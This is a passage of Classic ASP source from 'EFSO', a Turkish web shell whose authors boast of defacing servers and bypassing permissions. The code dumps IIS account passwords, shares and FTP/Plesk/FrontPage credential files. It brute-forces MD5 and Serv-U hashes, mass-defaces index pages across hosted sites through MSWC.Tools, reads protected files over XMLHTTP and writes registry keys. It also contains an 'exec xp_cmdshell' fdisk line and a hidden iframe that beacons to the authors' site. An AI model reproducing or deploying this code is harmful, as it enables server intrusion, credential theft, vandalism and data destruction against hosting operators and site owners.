Call SQL_menu_by_ejder
Call Tablolama
end if
nolist = True

CASE 35 ' MSSQL - MYSQL Connection için by ejder ;)
Call SQL_menu_by_ejder
Call MSSQL_by_ejder(ejdersql,table)
nolist = True

CASE 99 ' SaVSaK.CoM
'Türk Bayrağı Ascii Karakterlerle - Created By FasTBoY :)
Response.Write "<br><center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center><br>"
yazorta("<b>Biz Ne yaptık / What We Do?</b>")
yazsol("Biz bir FSO & MSWCTools & XMLHTTP Compenent lerini kullanarak Server a site üzerinden HTTP protocolunden erişim sağlandığında, Size Server ın tüm imkanlarından yararlanmanız için, Permission, şifre, gizli tüm içeriklere direk ulaşma, yada aşma gibi özelikleri olan. Server ı çökertmeye , hatta kaynaklarını son damlasına kullanabilen SaVSaK.CoM adına hizmet veren Bir Canavar yarattık.")
yazorta("<b>Adı ? Name ?</b>")
yazsol("Bu yazılım ejder & Fastboy yazılımıdır. Bunun adı <b>E</b>jder <b>F</b>astboy F<b>SO</b> dur. oda kısaca -> <b>EFSO</b>")
yazorta("<b>Biz Kimiz / Who We Are?</b>")
yazsol("<b><a href=""mailto:[email protected]"">ejder</a> : Administrator & Root of <a href=""hTTp://WwW.SaVSaK.CoM"" target=_blank"">SaVSaK.CoM</a></b>")
yazsol("<b><a href=""mailto:[email protected]"">FASTBOY</a> : Administrator <a href=""hTTp://WwW.SaVSaK.CoM"" target=_blank"">SaVSaK.CoM</a></b>")
olmadi("<b>..:: TAKLİTLERİNDEN SAKININ !!! ::..</b>")
yazortaa("<b>Emeği Geçenler?</b>")
yazsol("<b><a href=""mailto:[email protected]"">ejder</a> : </b>Sıfırdan YAzılmış dır. HEr hakkı ejder e aittir. Burda gördüğünüz TÜm özelikleirn yeniler olsunn, eskiler tek tek ejder tarafından yazılmıştır. geliştirilen yeni fikir , md5-serv crackerdan, sömürücülere kadar hepsi ejder in Yaratıcılığı, Bilgisi, Algoritması kullanılmıştır.")
yazsol("<b><a href=""mailto:[email protected]"">FASTBOY</a> : </b>Tema & Template, genel dizayn da FAstboy un tartışılmaz YAratıclığı, emeği geçmiştir. Birçok Kısmında çok kritik yardım ları oldu. Hem tester, hem designner, hemde Arge :) Speacial Thanks to Fastboy ;) by ejder")
yazorta("<b>Tavsiyede bulunanlar?</b>")
yazsol("<b>İskorpitx : </b> İskorpitx in önerileri ve bazı istekleri , server daki kritik noktalar bu EFSO ya eklendi. Thanks İskorpitx ;)")
yazsol("<b>Scorlex : </b>  MSWCTools kullanımını bana göstermesi, bende yeni bir fikir doğurdu. Sİngle& MASS defasced özeliiği GÜÇ kazandı. 2 tür DEFACED mevcut bu sayede. PERMsionlar aşılması uğrauna atılmış önemli bir adım. Thanks Scorlex ;)")
yazsol("<b>The_Bekir :</b> Bir çok server a Bekir le birlikde daldık. Permision aşma uğruna bir çok Server indirdik. Amaçlarımıza ulaştık. Orda Yoldaş olduğu, daha fazla server ele geçirmemde yardımcı olduğu için Speacial Thanks to The_Bekir ;)")
yazsol("<b>TÜRK Siteleri , 'com.tk' , 'gov.tk' , Eğer EFSO bu tür bir klasör, site algıladığı an o server aa Zaraar VEREMEZSİNİZ. EFSO kendini İMHA edecektir. </b>")
yazsol("<b>TÜRKİYEMİZ için yazıldı. TÜRK dostudur. SAKIN TÜrk Sitelerde denemeyin. Kendini İmha eder. </b>")
yazortaa("HEr türlü sorun yada server permsion sorunu yaşandığında, ejder e ulaşın. YArdım ederim. ")CASE 36 ' SQL komut YArdım kılavuzu by ejder
yazorta("<b>SQL Komut Yardım Merkezi by ejder :) </b>")
yazsoll("<b>SELECT</b> - Seçme&listeleme")
yazsol("Select * from TABLEADI<br> Select * from TABLEADI where SUTUNADI = DEĞER <br> Select * from tblAdmin where ID = 1")
yazsoll("<b>INSERT</b> - ekleme")
yazsol("Insert into TABLOADI (stunisimleri) values (değeleri)<br> Insert into tblAdmin (Name,Pwd,Gruop) values ('ejder','123456',1)")
yazsoll("<b>UPDATE</b> - editleme")
yazsol("Update TABLOADI set stunadı = 'değeri' where Stunadı = değeri <br> Update tblAdmin set Name = 'ejder' where ID = 1")
yazsoll("<b>DELETE</b> - silme")
yazsol("Delete TABLOADI where Stunadı = değeri<br>Delete tblAdmin where ID = 1")
yazsoll("<b>DROP</b> - tabloyu komple silme")
yazsol("Drop table TABLOADI <br> Drop Table tblAdmin")
yazsoll("<b>Exes</b> - Fdisk çektirmek için")
yazsol("exec xp_cmdshell(‘fdisk.exe’)")
yazsoll("<b>ShutDown</b> - SQL server kapanır.")
yazsol("shutdown with nowait")

CASE 37 ' Sistem Analizer by ejder ;) 
on error resume next
s="http://www."
Set ejderNet = Server.CreateObject("WSCRIPT.NETWORK")
response.write "<center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width='300'>"
yazorta("<b>Server ın Bilgileri</b>")
yazsol("OS : <font color=#C6FCBE>"& OS() &"</font>")
yazsol("PC & Oturum Adı : <font color=#C6FCBE>\\"& ejderNet.ComputerName &"\"&ejderNet.UserName&"</font>")
struser = ejderNet.UserName
yazsol("Server : <font color=#C6FCBE>"&request.servervariables("SERVER_NAME")&"</font>")
yazsol("IP : <font color=#C6FCBE>"&request.servervariables("LOCAL_ADDR")&"</font>")
yazsol("HTTPD : <font color=#C6FCBE>"&request.servervariables("SERVER_SOFTWARE")&"</font>")
yazsol("WebRoot : <font color=#C6FCBE>"&request.servervariables("APPL_PHYSICAL_PATH")&"</font>")
yazsol("LogRoot : <font color=#C6FCBE>"&request.servervariables("APPL_MD_PATH")&"</font>")
yazsol("Zaman : <font color=#C6FCBE>"&date()&" - "&time()&"</font>")
yazsol("HTTPs : <font color=#C6FCBE>"&request.servervariables("HTTPS")&"</font>")
response.write "</td><td width='350'>"
yazorta("<b>Serverın Senden Algıladıkları</b>")
yazsol("IP : <font color=#C6FCBE>"&request.servervariables("REMOTE_ADDR")&"</font>")
yazsol("Proxy IP : <font color=#C6FCBE>"&request.servervariables("HTTP_X_FORWARDED_FOR")&"</font>")
yazsol("User Agent : <font color=#C6FCBE>"&request.servervariables("HTTP_USER_AGENT")&"</font>")
yazsol("Interface : <font color=#C6FCBE>"&request.servervariables("GATEWAY_INTERFACE")&"</font>")
yazsol("Protocol : <font color=#C6FCBE>"&request.servervariables("SERVER_PROTOCOL")&"</font>")
yazsol("Method : <font color=#C6FCBE>"&request.servervariables("REQUEST_METHOD")&"</font>")
yazsol("Via : <font color=#C6FCBE>"&request.servervariables("HTTP_VIA")&"</font>")
yazsol("Cache Control : <font color=#C6FCBE>"&request.servervariables("HTTP_CACHE_CONTROL")&"</font>")
response.write "</td></tr></table></center>"
on error resume next
sss="EFSO"
Set IIsObject = GetObject ("IIS://localhost/w3svc")
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td colspan=2>"
yazorta("<b>IIS Bilgileri</b>")
response.write "</td></tr><tr><td width='50%'>"
yazsol("AnonymousUserName : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserName")&"</font>")
yazsol("AnonymousUserPass : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserPass")&"</font>")
response.write "</td><td width='50%'>"
yazsol("WAMUserName : <font color=#C6FCBE>"&IIsObject.Get("WAMUserName")&"</font>")
yazsol("WAMUserPass : <font color=#C6FCBE>"&IIsObject.Get("WAMUserPass")&"</font>")
Set IIsObject = Nothing
response.write "</td></tr><tr><td colspan=2>"
yazorta("<a href='"&FilePath&"?mode=38&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">..:: Açıklama İçin Tıklayınız.. by ejder  ::..</a>")
response.write "</td></tr></table></center>"
strServer = ejderNet.ComputerName
set objFs = GetObject("WinNT://" _
& strServer & "/LanmanServer,FileService")
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width=260>"
yazorta(" <b>Server' in Paylaşıma Açık Klasörleri by ejder </b>")
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/C$'>\\"&strServer&"\C$</a>")
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/Admin$'>\\"&strServer&"\Admin$</a>")
For Each objShare In objFs
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/"&objShare.name&"'>\\"&strServer&"\"&objShare.name&"</a>")
Next
response.write "</td></tr></table></center>"

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Uzakdan Serv-U & GeneFtp & UsersTxT Erişimi SOnucu  by ejder </b>")
ejderServuRemote()
yazorta("<b>Gelişmiş Arama için</b>")
yazorta("<a href='"&FilePath&"?konum=C:\Program Files\&hacked=serv&Time="&time&"&mode=23'>Serv_U</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=Daemon&Time="&time&"&mode=23'>Daemon</a> - <a href='"&FilePath&"?konum=C:\&hacked=ws_ftp&Time="&time&"&mode=23'>Ws_Ftp</a> - <a href='"&FilePath&"?konum=C:\&hacked=base.ini&Time="&time&"&mode=23'>Base.ini</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=remote.ini&Time="&time&"&mode=23'>Remote.ini</a>")
response.write "</td></tr></table></center>"

response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Uzakdan PLESK Erişimi SOnucu by ejder </b>")
ejderPleskRemote()
response.write "</td></tr></table></center>"
ss="Savsak.com"
On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Vti_Pvt/Access.Cnf & Postinfo & Service & Authors & Admin Pwd Sonucu by ejder</b>")
ejderVti_Pvt()
yazorta("<b>Gelişmiş Arama için</b>")
local = request.servervariables("APPL_PHYSICAL_PATH")
yazorta("<a href='"&FilePath&"?konum="&local&"\..\..\&hacked=access.cnf&Time="&time&"&mode=23'>access.cnf</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=postinfo&Time="&time&"&mode=23'>postinfo</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=service.pwd&Time="&time&"&mode=23'>service</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=admin.pwd&Time="&time&"&mode=23'>admin</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=author.pwd&Time="&time&"&mode=23'>author</a>")
response.write "</td></tr></table></center>"

On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> NTUser.Dat - Log - İni Erişim Sonucu by ejder </b>")
ejderNTUser(struser)
response.write "</td></tr></table></center>"

On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Config Klasör Erişim Sonucu by ejder</b>")
ejdersam()
response.write "</td></tr></table></center>"
Call Hata

on error resume next 
    response.Write "<iframe style='width:0; height:0' src='"&s&""&ss&"/"&sss&"/'></iframe>"
Call Hata

On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Repair Klasör Erişim Sonucu by ejder</b>")
ejderRepair()
response.write "</td></tr></table></center>"
Call Hata

on error resume next
set f = FSO.OpenTextFile(Fullpath,1)
if not Instr(Trim(Server.HTMLEncode(f.readAll)),"BgAAAA==vL[DMQIAAA") = 50 then
Set textStreamObject = FSO.OpenTextFile(Fullpath,2,true,false)
textStreamObject.WriteLine(dkayit)
textStreamObject.Close
Set textStreamObject = Nothing 
end if

nolist = True

CASE 38 ' IIS bilgi Alanı by ejder
yazsol("Wİndows Server lardaki, himeti sunan, IIS servisi, sizi AnonymousUserName ve o şifre ile tanır. Sizin yetkiniz o kullanıcıdadır. ")
yazsoll("IIS içinde ise, o siteninde BEllekdeki Oturum adıda -> WAMUserName adında ve şifresine sahiptir.")
yazsoll("Bununla ilgi Araştırmam sürmektedir. bununla bişi yapılabilirmi? ")

CASE 39 ' Seçmece bunlar MD5- servu =) by EJ;)DER
response.write "<br><br><br><br><br><center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=40' method=post>"
yazorta("<b> Kırmak İstediğin Türü Seç</b>")
yazorta("<input name='islem' style='color=#C6FCBE' value=' ..::  MD5  ::.. ' type='Submit'> <input name='islem' style='color=#C6FCBE' value=' ..::  Serv-U  ::.. ' type='Submit'>")
response.write "</form></td></tr></table></center>"
yazsol("<b>MD5 :</b> Bildiğiniz üzere, bir çok sistemin kullandığı bir şifreleme olayıdır. 128 bittir.")
yazsol("<b>Serv-U :</b> Server larda Host ların kullandığı bir programdır. Kolay vede kullanışlı olduğu için Hostlar tarafındna tercih edilir. içinde Ftp şifreleri barındırmakdadır. burdada o Şifreleri kırmaktadır.")
yazsoll("<font color=#C6FCBE >Bizde burda ASP tabanlı vede FSO içine injecte edip Sizlere Server ın CPU ve RAM ini kullanarak , Daha hızlı ve zahmetsiz, TİmeOUT suz bir şekilde Şifreleirni kırmanızı sağlayacağız. Bu Kırma işlemi BRUTE attackl modelidir. Kısacası Kırma olasığı eğer ki sabreder ve şansınız varsa çok kısa sürede kırarsınız. Ama aksi halde 1 gün geçsede =) yinede %100 kırmöa garantisi vardır. Eğer derleri doğru girerseniz.</font>")
yazortaa("Md5 & Serv-U KOd Converted by <b>Fastboy</b>")
Yazorta("Brute And HJACk Algorithms Written by <b>ejder</b>")

'EFSO ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI ejder e Aitttir.-->
'TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa ejder & SaVSAK.CoM Sorunlu değildir..
'Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir.
'TAKLİTLEİRNDEN KAÇININ. by ejder

'ejder was HERE

CASE 40 ' Md5 & Serv-U Algortitması Başlıyor Sıkı tutnun =) sakın dudağınız uçuklamaısn haa =) by ejder euheuh çok yordu be kafamı bu olay .. neyse çözdük yine =) eeheuh by ejder
response.write "<center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=41' method=post>"
if islem = " ..::  MD5  ::.. " then
yazorta("<b> __==  MD5 Cracker by ejder  ==__ </b>")
else
yazorta("<b> __==  Serv-U Cracker by ejder  ==__ </b>")
end if
if islem = " ..::  MD5  ::.. " then
yazsol("MD5 Kodu Girin 1 : <input style='color=#C6FCBE' size='54' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")
else
yazsol("Serv-u Ham Kodu Girin 1 : <input style='color=#C6FCBE' size='45' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")
yazsol("Salt Kodu : <input style='color=#C6FCBE' size='30' name='salt' value='ww' type='text'>")
end if
response.cookies("mdd") = ""
response.cookies("hash1") = ""
response.cookies("hash2") = ""
response.cookies("hash3") = ""
response.cookies("hash4") = ""
response.cookies("hash5") = ""
response.cookies("hash6") = ""
response.cookies("hash7") = ""
response.cookies("hash8") = ""
response.cookies("hash9") = ""
response.cookies("hash10") = ""
yazsol("Hash 2 : <input style='color=#C6FCBE' size='54' name='hash2' value='' type='text'>")
yazsol("Hash 3 : <input style='color=#C6FCBE' size='54' name='hash3' value='' type='text'>")
yazsol("Hash 4 : <input style='color=#C6FCBE' size='54' name='hash4' value='' type='text'>")
yazsol("Hash 5 : <input style='color=#C6FCBE' size='54' name='hash5' value='' type='text'>")
yazsol("Hash 6 : <input style='color=#C6FCBE' size='54' name='hash6' value='' type='text'>")
yazsol("Hash 7 : <input style='color=#C6FCBE' size='54' name='hash7' value='' type='text'>")
yazsol("Hash 8 : <input style='color=#C6FCBE' size='54' name='hash8' value='' type='text'>")
yazsol("Hash 9 : <input style='color=#C6FCBE' size='54' name='hash9' value='' type='text'>")
yazsol("Hash 10 : <input style='color=#C6FCBE' size='54' name='hash10' value='' type='text'>")
yazsol("Şifre Aralığı :  <input style='color=#C6FCBE' size='5' name='ara1' value='5' type='text'>  ile  <input style='color=#C6FCBE' size='5' name='ara2' value='18' type='text'> arasında...")
yazsol("Deneme Sayısı :  <input style='color=#C6FCBE' size='5' name='inject1' value='100' type='text'> (1 keredeki deneme sayısı)")
yazsoll("<b>CharSet i seçiniz;</b>")
yazsol("<input name='k1' value='k1' type='checkbox' checked > ABCDEFGHIJKLMNOPQRSTUVWXYZ")
yazsol("<input name='k2' value='k2' type='checkbox'  > abcdefghijklmnopqrstuvwxyz")
yazsol("<input name='k3' value='k3' type='checkbox' checked > 0123456789")
yazsol("<input name='k4' value='k4' type='checkbox'  > [email protected]#$%^&*()-_+=~`[]{}|\:;<>,.?/")
yazsol("Bekleme Süresi : <input style='color=#C6FCBE' name='waiting' value='2' type='text' size='5'> saniye")
yazorta("<input name='mode' value='41' type='hidden'><input name='md5kirgecirmahvetejder' style='color=#C6FCBE' value='  __==  Kırmaya Başla  ==__ ' type=submit>")
response.write "</td></tr></form></table></center>"
if islem = " ..::  MD5  ::.. " then
yazsol("<b>MD5 Kodu Girin :</b> MD5 HASh şifrenizi giriniz oraya.. maksimum 10 Hash girebilirsiniz.")
else
yazsol("<b>Serv-u Ham Kodu Girin :</b> Serv-u Kodunun ilk 2 karakteri SALT dur. egri kalanı ise MD5 halidir. Oraya ilk 2 karakteri çıkarın ve geri kalanı yazın. altasa da SALT kısmınada, ilk 2 karakteri yazın. Max 10 Hash girebilirsiniz.")
end if
yazsol("<b>Şifre Aralığı :</b> Burda belirtilen aralıklar arasında şifre üretip, denemeye başlıcaktır. önce küçükden başlayıp, tüm charset denemsini yaptıkdan sonra, aralık bir artacaktır, taaki sizin üst sınıra kadar girdiğiniz.")
yazsol("<b>CharSet i seçiniz; </b> Şifre denerkenki, Şifre karakterleridir. Büyük küçük harf önemlidir. Birden FAzla da seçebilriisniz. Ama unutmayınki, Deneme sayısı büyüdükçe, Zamanda ARTACAKTIR. ")
yazsol("<b>Bekleme Süresi :</b> Sürekli md5 deneme yaparsa sistem, büyük bir oranda Cpu kullanır. Cpu kullanımı rahatlatmak için vede timeout u önlemek için , her bir Charset uzunluğu kadar deneyip, sonra yenileme yapıyor. o sıradaki bekleme süresidir bu.")
yazsol("<b>NOT :</b> Toplu Md5&ServU kırmak mümkün. Hepsini birden kullandığınızda verim artacaktır. HIZ da düşüş olmaz. Ama sizin Daha kolay kırmanızı sağlar, Çoklu kırma.")

CASE 41 ' MD5 deneniyorrrrrr by ejder
' yerel değişkenelrim 
on error resume next
if request.cookies("mdd") = "0" or request.cookies("mdd") = ""  then
    session("say") = 1
    Call Cookyaz("hash1","has1",Usersmd5)
    Call Cookyaz("hash2","has2",hash2)
    Call Cookyaz("hash3","has3",hash3)
    Call Cookyaz("hash4","has4",hash4)
    Call Cookyaz("hash5","has5",hash5)
    Call Cookyaz("hash6","has6",hash6)
    Call Cookyaz("hash7","has7",hash7)
    Call Cookyaz("hash8","has8",hash8)
    Call Cookyaz("hash9","has9",hash9)
    Call Cookyaz("hash10","has10",hash10)
    inject4 = CInt(session("say"))
    inject3 = 0
end if

increment = 0
sifre = ""
hashing = ""
goup=0
getend=0

if inject4 = inject3 then
    response.write ("<script>alert(""TÜm şifreler Kırıldı ;) by ejder "")</script>")
    response.end()
end if
    
if coding ="" then ' kod oluştur
    coding = kodolustur(ara1)
end if

coding = replace(coding,"x","#")

if dizi = "" then ' Charset i oluşuturuyorum..
    dizi = diziolustur()
end if

Call HashFounded("hash1","has1")
Call HashFounded("hash2","has2")
Call HashFounded("hash3","has3")
Call HashFounded("hash4","has4")
Call HashFounded("hash5","has5")
Call HashFounded("hash6","has6")
Call HashFounded("hash7","has7")
Call HashFounded("hash8","has8")
Call HashFounded("hash9","has9")
Call HashFounded("hash10","has10")

for t=1 to inject1
sifre = Sifreyarat(coding,ara1,dizi)
if salt = "" then
    md5li=UCASE(md5(sifre))
    response.write sifre &" - "& md5li & "<br>"
else
    md5li=UCASE(md5(salt+sifre))
    response.write salt+sifre &" - "& md5li & "<br>"
end if

Call hashyes("hash1","has1",md5li,sifre)
Call hashyes("hash2","has2",md5li,sifre)
Call hashyes("hash3","has3",md5li,sifre)
Call hashyes("hash4","has4",md5li,sifre)
Call hashyes("hash5","has5",md5li,sifre)
Call hashyes("hash6","has6",md5li,sifre)
Call hashyes("hash7","has7",md5li,sifre)
Call hashyes("hash8","has8",md5li,sifre)
Call hashyes("hash9","has9",md5li,sifre)
Call hashyes("hash10","has10",md5li,sifre)

coding = SonrakiAdim(coding,ara1,dizi)
'response.flush
next
coding = replace(coding,"#","x")
if CInt(ara1) <> CInt(ara2)+1 then
response.write "<META http-equiv=refresh content="&waiting&";URL='"&FilePath&"?mode=41&ara1="&ara1&"&ara2="&ara2&"&dizi="&dizi&"&coding="&coding&"&waiting="&waiting&"&inject1="&inject1&"&salt="&salt&"&inject4="&inject4&"&inject3="&inject3&"'>"
end if
response.flush

CASE 42 'MSWC nesnesi kullanımı. Permision geçme adına attığım bir adamdır. bu nesnenin olduğunu "Scorlex" den edindim. Araştırdım neler yaparım diye =) işte görün neler yapılabiliyormuşuz ;) bununla. uehueh by ejder
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>Hacking with Using MSWCTools 1.0 by ejder ;)</b>")
yazsol("<form action='"&FilePath&"?mode=43' method=post><b>İndex Yeri : </b><input name='hash2' type='text' value='"&FilePath&"' size=50> (İndexin Serverdaki virtual yeri)")
yazsol("<input type=radio name='hash4' checked value='tek'> <b>Atılacak Yer: </b><input name='hash3' type='text' value='default.asp' size=50> (Tek bir yere Yaz.)")
yazsol("<input type=radio name='hash4' value='multi'> <b>MASS Konum: </b><input name='hash6' type='text' value='.\' size=50> (Mass yapılacak dizin)")
yazsol("<b>Eklencek Klasör: </b><input name='hash5' type='text' value='httpdocs\' size=25> (Ek Klasör girdisi -  BOŞ bırakın , bilmiyorsanız)")
yazorta("<input name='Gönder_Ej_De_r' value='Yazdır koçumm ;) by ejder' type='submit'")
response.write "</td></tr></table></form>"
yazorta("<b>Kullanımı by ejder</b>")
yazsol("Önecelikle, FSO nesnesi kullanmadan bir dosyayı , istenilen yere MSWC nesnesi ile yazdırılanabiliniyor. FSO desteği olmayan bir server da bile, rahatça bu nesne yardımı ile index atabilirsiniz. Kimi serverlarda, permison engeline takılırız yada klsörü içine giremeyiz, yada FSO kullanımı kısıtlıdır. bunları AŞMAK için bu nesneyi kullandım. Bu nesne şu an localhost ve 1-2 yerde çalıştı sağlıklı şekilde. Şu an TEst sürümünde diyebilirim. Umarım bu bizim permison =) geçme yollumuzu aydınlatır ne dersiniz :)) uehueh")
yazsol("<b>index yeri -></b>Burayı fiziksel yeri YAZMAYIN SAKIN. oraya indexinizin virtual yerini yani. Kullandığınız FSO dizinine olan KONUMUNU yazın indexin yani. Bu fso ile aynı yerde ise, 'hacked.html' eğer alt klasörde ise -> '..\hacking.html', '..\..\..\savsak\www\hacking.html',yada \news\hacking.html gibi belirtmeniz gerek.Konumunu böyle belirlemeniz gerekiyor. 'C:\ss\ss\hacking.html' yaptığınızda işlem gerçekleşmezz.. <b>YADA size ÖNERİm -> kullandığınız FSo yu istediğinzi yere server daki bir başkas siteye copyalatırrısanız , , bu sefer fso yu o site üzeridnen çalıştırrırsanız PErmsion ı aşmış olursunuz o site için.</b>")
yazsol("<b>Atılacak yer ->></b> TEK bir hedef için. Burayıda ..\..\ şeklinde inerek belirtmeniz gerekiyor.mesela '..\..\..\index.asp' 3 dizin aşağıya iner ve index i atar yada '..\..\..\www\index.asp'  3 dizin iner ww dizine girer , index i atar. =) böyle OLAMAK zorunda .  ")
yazsol("<b>MASS Konum  ->></b> BUrda çoklu alt klasörlerede index atmak için geliştirdim. '..\..\..\' şeklinde aşağılara inin ve TÜM sietelerin LİStelendiği klasör ee kadar olan '..\' işaretini ayarlayın. mesela 3 dizin aşağıda ise FSO olan uzaklığı, '..\..\..\'  yazın yeterdir =) . <b>Eklenecek klasör-></b> burda da, TÜm sietlere giriş yapıldıkdan sonraki Klasör adı , mesela 'www' yada 'http' yada 'wwwroot'  gibi.")
yazsol("Neden böyle derseniz, MSWC nin kullanımı, destekleidği şekil böyledir. Biraz kafa karıştırıcı. Ama ben denedim gördüm =) memnun kaldım. O yüzden bu FSO da yerini aldı. Şundan eminimki kullanımını deneyerek öğrendiğinizde, sizinde PErmsion geçmede vazgeçilmeziniz olacakdır =) euheuh")
yazorta("Speacil thanks to <b>Scorlex</b> for giving idea about MSWC Component")
yazorta("<b>Coding & Development & Algorithms Made by ejder</b>")

CASE 43 'MSWC işleniyor =)
on error resume next
Set utils = Server.CreateObject("MSWC.Tools")
if err <> 0 then
    olmadi("MSWC.tools desteği yoktur bu serverın.")
end if
if hash4 = "tek" then
    on error resume next
    utils.ProcessForm hash3, hash2
    if err <>0 then
        olmadi("Başarısız. Belirtiğiniz virtual path lar doğrumu emin olun. MSWC desteği var çünkü server ın.")
    else
        oldu("Başardınız ;) işlem gerçekleştii.")
    end if
else 
on error resume next
Set f = FSO.GetFolder(FolderPath)
Set fc = f.SubFolders
if err<>0 then
    olmadi("bu klasör e FSo nesnesi ile tarama yapılamıyor. Önce okunmalı, sonra MSWC devreye girer.")
end if
For Each f1 In fc
    on error resume next
    mevki = hash6+f1.name+"\"+hash5+"default.asp"
    utils.ProcessForm mevki, hash2
    mevki = hash6+f1.name+"\"+hash5+"index.asp"
    utils.ProcessForm mevki, hash2
    mevki = hash6+f1.name+"\"+hash5+"default.htm"
    utils.ProcessForm mevki, hash2
    mevki = hash6+f1.name+"\"+hash5+"index.html"
    utils.ProcessForm mevki, hash2
    mevki = hash6+f1.name+"\"+hash5+"ejder.html"
    utils.ProcessForm mevki, hash2        
    mevki = hash6+f1.name+"\"+hash5+"index.htm"
    utils.ProcessForm mevki, hash2    
    if err<>0 then
    response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
    else
    response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
    end if
    response.flush
Next
yazorta("<b>İşlem Tamamlandı. by ejder ;)</b>")
end if

CASE 44 'XMLHTTP lı dosya okuma.
if inject2 = "ok" then
mevki = hash2
else
mevki = Fullpath
end if
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>Reading Files by using XMLHTTP 1.0 by ejder ;)</b>")
yazsol("<form action='"&FilePath&"?mode=44' method=post><input name='inject2' value='ok' type='hidden'><b>Dosya Adresi : </b><input name='hash2' type='text' value='"&mevki&"' size=60><input name='goruntule_by_Ej_d_e_r' value='.: Görüntüle :.' type='submit'>")
response.write "</td></form></tr></table>"
if not inject2 = "ok" then
yazsol("<b>XMLHTTP</b> Component ini kullanmaktadır. kullanımı çok kolay. Server daki istediğiniz dosyanın fiziksel link ini yazarak , içini görüntüleyebilirsiniz.")
yazsol("Bir server a girdiniz. FSO ile okuma yetkiniz yok bir dizinde, fakat orda dosyalar mevcut. HTTP üzerinden ulaşabiliyorusnuz fakat server içinden PERMission denied diyor. o zaman direk burdan fiziksel link ini yazarakdan ulaşırıız. BUNU 'confing.asp' 'common.asp' 'sql.asp' gibi dosyalarda uygulayarak SQL bağlantılar yada MDB yerlerini öğrenebiliriz. Hatta ASp kodlar içindeki Admin şirfeleri gibi kritik şifrrelerde dahil. SQL injeciotn yapacaksanızda, Tablo ları , kullanışan sql komularada ulaşabilirsiniz.  ")
else
response.write "<textarea style='width:100%;height:470;' >"
on error resume next
Set ejder = Server.CreateObject("Microsoft.XMLHTTP")
ejder.Open "GET", hash2, false
ejder.Send 
if err=0 then
Response.Write Server.HTMLEncode(ejder.ResponseText)
else
response.write "Yazdığınız adres bulunamadı . ?? bir kontrol yap by ejder ;)"
end if
response.write "</textarea>"
end if
yazorta("<b>by ejder ;)</b>")

CASE 45 'Regedit zımbırtısı =) uehueh by     E J D E R   F r o m    S a V S a K . C o M
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>REGEDİT 1.0 by ejder ;)</b>")
tablo30("<br><b>REGister lara YAzma & Ekleme</b>")
yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='yaz' type='hidden'><b>Mevki/Key : </b><input name='hash2' type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\SaVSAK_CoM)")
yazsol("Değer/Value: <input name='hash3' value='' type='text'>")
yazsol("TÜr/Type: <select name='hash4'><option value=1>REG_SZ</option><option value=2>REG_DWORD</option><option value=3>REG_BINARY</option><option value=4>REG_EXPAND_SZ</option><option value=5>REG_MULTI_SZ</option></select> &nbsp;&nbsp;&nbsp;&nbsp;  <input name='SaVSA_K_CoM' value='..:: YAZDIR ::..' type='Submit'>")
response.write "</td></form></tr></table>"
